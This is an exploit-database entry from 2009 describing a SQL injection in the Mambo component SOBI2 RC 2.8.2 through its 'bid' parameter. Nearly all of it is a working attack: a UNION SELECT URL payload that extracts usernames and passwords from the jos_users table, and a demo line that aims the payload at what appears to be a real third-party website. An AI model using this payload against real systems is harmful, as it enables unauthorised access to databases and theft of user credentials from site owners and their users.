Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability

2009-01-21T00:00:00
ID 1337DAY-ID-4716
Type zdt
Reporter Br1ght [email protected]
Modified 2009-01-21T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability
================================================================


=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
 
 
<<->> D0rk    : find it
 
<<->> Exploit :>>>                
                                    
              :>>>  http://www.site.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+0,concat(username,0x3a3a,password),0+from+jos_users--
 
<<->>  DeM00  :>>>  http://www.karmel.co.il/index.php?option=com_sobi2&task=showbiz&bid=-78+union+select+1,concat(username,0x3a3a,password),3+from+jos_users-- 




#  0day.today [2018-02-02]  #